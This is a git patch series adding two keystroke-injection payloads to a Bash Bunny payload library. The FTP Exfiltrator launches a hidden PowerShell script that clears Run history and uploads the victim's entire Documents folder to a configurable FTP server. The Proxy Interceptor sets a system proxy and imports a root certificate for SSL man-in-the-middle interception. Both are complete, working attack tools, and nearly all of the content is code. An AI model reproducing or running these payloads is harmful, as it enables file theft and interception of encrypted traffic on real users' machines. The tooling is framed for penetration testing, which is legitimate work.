From 385a54656c4a6cad5ff8feec1f1bcbe101528f72 Mon Sep 17 00:00:00 2001 From: nutt318 Date: Fri, 7 Apr 2017 01:51:38 -0500 Subject: [PATCH 1/2] Added FTPExfiltration payload (#90) * First commit of all documents First commit * Fixed user document folder * Removed unneeded line * Edited URL to forum --- payloads/library/ftp_exfiltrator/1.ps1 | 78 ++++++++++++++++++++ payloads/library/ftp_exfiltrator/payload.txt | 27 +++++++ payloads/library/ftp_exfiltrator/readme.md | 26 +++++++ 3 files changed, 131 insertions(+) create mode 100644 payloads/library/ftp_exfiltrator/1.ps1 create mode 100644 payloads/library/ftp_exfiltrator/payload.txt create mode 100644 payloads/library/ftp_exfiltrator/readme.md diff --git a/payloads/library/ftp_exfiltrator/1.ps1 b/payloads/library/ftp_exfiltrator/1.ps1 new file mode 100644 index 00000000..1c0fec26 --- /dev/null +++ b/payloads/library/ftp_exfiltrator/1.ps1 @@ -0,0 +1,78 @@ +clear +#Clear Run History +remove-item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" + +# Credit to dkittell - https://gist.github.com/dkittell/f029b6c7d1c46ebcffcb +# I've modified a bit of his code to create a directory with the username, I'm sure there is a better way to do this but not sure how + +# FTP Server Variables - edit the xxxxx +$FTPHost = 'ftp://ftp.xxxxx.com/' + $env:username + '/' +$FTPUser = 'xxxxx' +$FTPPass = 'xxxxx' + +#Directory where to find files to upload +$UploadFolder = "$env:userprofile\Documents\" + +$webclient = New-Object System.Net.WebClient +$webclient.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass) + +$SrcEntries = Get-ChildItem $UploadFolder -Recurse +$Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} +$SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} + +#Creates Folder with victims Username +try { +$makeDirectory = [System.Net.WebRequest]::Create($FTPHost); +$makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass); +$makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; +$makeDirectory.GetResponse(); +} +catch [Net.WebException] {} + +# Create FTP Directory/SubDirectory If Needed - Start +foreach($folder in $Srcfolders) +{ + $SrcFolderPath = $UploadFolder -replace "\\","\\" -replace "\:","\:" + $DesFolder = $folder.Fullname -replace $SrcFolderPath,$FTPHost + $DesFolder = $DesFolder -replace "\\", "/" + # Write-Output $DesFolder + + try + { + $makeDirectory = [System.Net.WebRequest]::Create($DesFolder); + $makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass); + $makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; + $makeDirectory.GetResponse(); + #folder created successfully + } + catch [Net.WebException] + { + try { + #if there was an error returned, check if folder already existed on server + $checkDirectory = [System.Net.WebRequest]::Create($DesFolder); + $checkDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass); + $checkDirectory.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; + $response = $checkDirectory.GetResponse(); + #folder already exists! + } + catch [Net.WebException] { + #if the folder didn't exist + } + } +} +# Create FTP Directory/SubDirectory If Needed - Stop + +# Upload Files - Start +foreach($entry in $SrcFiles) +{ + $SrcFullname = $entry.fullname + $SrcName = $entry.Name + $SrcFilePath = $UploadFolder -replace "\\","\\" -replace "\:","\:" + $DesFile = $SrcFullname -replace $SrcFilePath,$FTPHost + $DesFile = $DesFile -replace "\\", "/" + # Write-Output $DesFile + + $uri = New-Object System.Uri($DesFile) + $webclient.UploadFile($uri, $SrcFullname) +} +# Upload Files - Stop \ No newline at end of file diff --git a/payloads/library/ftp_exfiltrator/payload.txt b/payloads/library/ftp_exfiltrator/payload.txt new file mode 100644 index 00000000..eff48232 --- /dev/null +++ b/payloads/library/ftp_exfiltrator/payload.txt @@ -0,0 +1,27 @@ +#!/bin/bash +# +# Title: FTP Exfiltrator +# Author: Nutt +# Version: 1.0 +# Target: Windows +# +#Exfiltrates files from the users Documents folder +#FTP's all files/folders to a specified FTP site named by the victim hostname. +#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site. + +#Executes 1.ps1 + +#Purple.........Setup +#Red............Failed - Need to work on +#Green..........Finished + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +LED R B +ATTACKMODE HID STORAGE +QUACK GUI r +QUACK DELAY 1000 +QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')" +QUACK ENTER +LED G \ No newline at end of file diff --git a/payloads/library/ftp_exfiltrator/readme.md b/payloads/library/ftp_exfiltrator/readme.md new file mode 100644 index 00000000..6b2416ed --- /dev/null +++ b/payloads/library/ftp_exfiltrator/readme.md @@ -0,0 +1,26 @@ +# FTP Exfiltrator for Bash Bunny + +* Author: Nutt +* Version: Version 1.0 +* Target: Windows + +## Description + +Exfiltrates files from the users Documents folder +FTP's all files/folders to a specified FTP site named by the victim hostname. +Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site. + +## Configuration + +Edit 1.ps1 to specify FTP site, username and password + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Purple | Setup | +| Red | Failed - Not working yet | +| Green | Attack Complete | + +## Discussion +[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40492-payload-ftp-exfiltrator/ "Hak5 Forum Thread") From c14732e57aaa915a5115c86b5bcc4448ea1a19d5 Mon Sep 17 00:00:00 2001 From: NightStalker Date: Fri, 7 Apr 2017 01:56:28 -0500 Subject: [PATCH 2/2] Added ProxyInterceptor payload (#82) * Sets specified proxy and imports certificate for MITM * Update cert.pem * Update README.md * Update README.md * Update README.md * Update README.md * Update README.md * Update vars.ps1 * Update payload.txt * Update README.md * Update README.md --- .../library/Proxy_Interceptor/ImportCert.ps1 | 6 ++ payloads/library/Proxy_Interceptor/README.md | 30 +++++++++ .../library/Proxy_Interceptor/SetProxy.ps1 | 19 ++++++ payloads/library/Proxy_Interceptor/cert.pem | 4 ++ .../library/Proxy_Interceptor/payload.txt | 65 +++++++++++++++++++ payloads/library/Proxy_Interceptor/vars.ps1 | 3 + 6 files changed, 127 insertions(+) create mode 100644 payloads/library/Proxy_Interceptor/ImportCert.ps1 create mode 100644 payloads/library/Proxy_Interceptor/README.md create mode 100644 payloads/library/Proxy_Interceptor/SetProxy.ps1 create mode 100644 payloads/library/Proxy_Interceptor/cert.pem create mode 100644 payloads/library/Proxy_Interceptor/payload.txt create mode 100644 payloads/library/Proxy_Interceptor/vars.ps1 diff --git a/payloads/library/Proxy_Interceptor/ImportCert.ps1 b/payloads/library/Proxy_Interceptor/ImportCert.ps1 new file mode 100644 index 00000000..d4612cb0 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/ImportCert.ps1 @@ -0,0 +1,6 @@ +#Import variables from vars.ps1 for use. +. .\vars.ps1 + +#Add certificate to certificate store +$certFile = ( Get-ChildItem -Path $certName ) +$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root \ No newline at end of file diff --git a/payloads/library/Proxy_Interceptor/README.md b/payloads/library/Proxy_Interceptor/README.md new file mode 100644 index 00000000..e8976216 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/README.md @@ -0,0 +1,30 @@ +# Proxy Interceptor for Bash Bunny + +Author: NightStalker + +Version: 1.0 + +## Description + +This payload will enable a proxy and import an SSL certificate to a Windows +computer for Internet Explorer and Chrome (FireFox is in progress for 2.0) +The script uses a combination of Ducky Code and PowerShell. + +*Note: Currently no falure LED, if remains red for more than 60 seconds +script failed. Will build checks in later version. + +## Requirements + +Certificate needs to be in .pem format and in the root switch directory with +payload.txt, set the certificate and proxy information in the vars.ps1 file. + +## STATUS + +| LED | Status | +| ---------------- | ------------------------------------- | +| White (blinking) | Script Running. | +| Purple (blinging)| Script Complete. | + +## Discussion + +https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/ diff --git a/payloads/library/Proxy_Interceptor/SetProxy.ps1 b/payloads/library/Proxy_Interceptor/SetProxy.ps1 new file mode 100644 index 00000000..74458979 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/SetProxy.ps1 @@ -0,0 +1,19 @@ +#Import variables from vars.ps1 for use. +. .\vars.ps1 + +#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it. +Set-ExecutionPolicy RemoteSigned -Scope CurrentUser +$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue +if ($ieProcess) { + $ieProcess.CloseMainWindow() +Sleep 5 +if (!$ieProcess.HasExited) { + $ieProcess | Stop-Process -Force + } +} +Remove-Variable ieProcess + +#Change the proxy settings in the registry +$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" +Set-ItemProperty -path $regKey ProxyEnable -value 1 +Set-ItemProperty -path $regKey ProxyServer -value $proxyVal \ No newline at end of file diff --git a/payloads/library/Proxy_Interceptor/cert.pem b/payloads/library/Proxy_Interceptor/cert.pem new file mode 100644 index 00000000..c0bfbec0 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/cert.pem @@ -0,0 +1,4 @@ +-----BEGIN CERTIFICATE----- +REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE +FROM PROXY FOR SSL INTERCEPTION. +-----END CERTIFICATE----- diff --git a/payloads/library/Proxy_Interceptor/payload.txt b/payloads/library/Proxy_Interceptor/payload.txt new file mode 100644 index 00000000..b5e180f9 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/payload.txt @@ -0,0 +1,65 @@ +#!/bin/bash +# +# Title: Proxy Interceptor +# Author: NightStalker +# Version: 1.0 +# +#This payload will enable a proxy and import an SSL certificate to a Windows +#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0) +#The script uses a combination of Ducky Code and PowerShell. +# +# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt +# +# Red Blinking.............Running Payload +# Purple Blinking .........Payload Completed + +#Set Red LED to indicate Starting of Script +LED R 50 + +#Set ATTACKMODE to HID and Storage to be able to transfer the certificate +ATTACKMODE HID STORAGE + +#Import Bunny Helpers +source bunny_helpers.sh + +#Start of Script +Q DELAY 6000 +Q GUI r +Q DELAY 100 +Q STRING POWERSHELL +Q ENTER +Q DELAY 100 + +#Change to the directory of the Bunny with the proper switch location +Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name +Q ENTER +Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\' +Q ENTER +Q STRING cd \$absPath +Q ENTER +Q DELAY 500 + +#Set the proxy in the internet settings in the registry (For IE and Chrome). +Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')" +Q ENTER +Q DELAY 500 + +#Import the certificate to the computer (for IE and Chrome). +Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')" +Q ENTER +Q DELAY 1000 +Q ALT y +Q DELAY 500 + +#Unmount the USB Drive. +Q STRING \$driveEject = New-Object -comObject Shell.Application +Q ENTER +Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\) +Q ENTER +Q DELAY 500 +Q ALT t +Q DELAY 500 +Q STRING EXIT +Q ENTER +sync +LED R B 100 diff --git a/payloads/library/Proxy_Interceptor/vars.ps1 b/payloads/library/Proxy_Interceptor/vars.ps1 new file mode 100644 index 00000000..9f2ffa59 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/vars.ps1 @@ -0,0 +1,3 @@ +#Set variables for use in payload. +$proxyVal = "proxyip:port" +$certName = "cert.pem"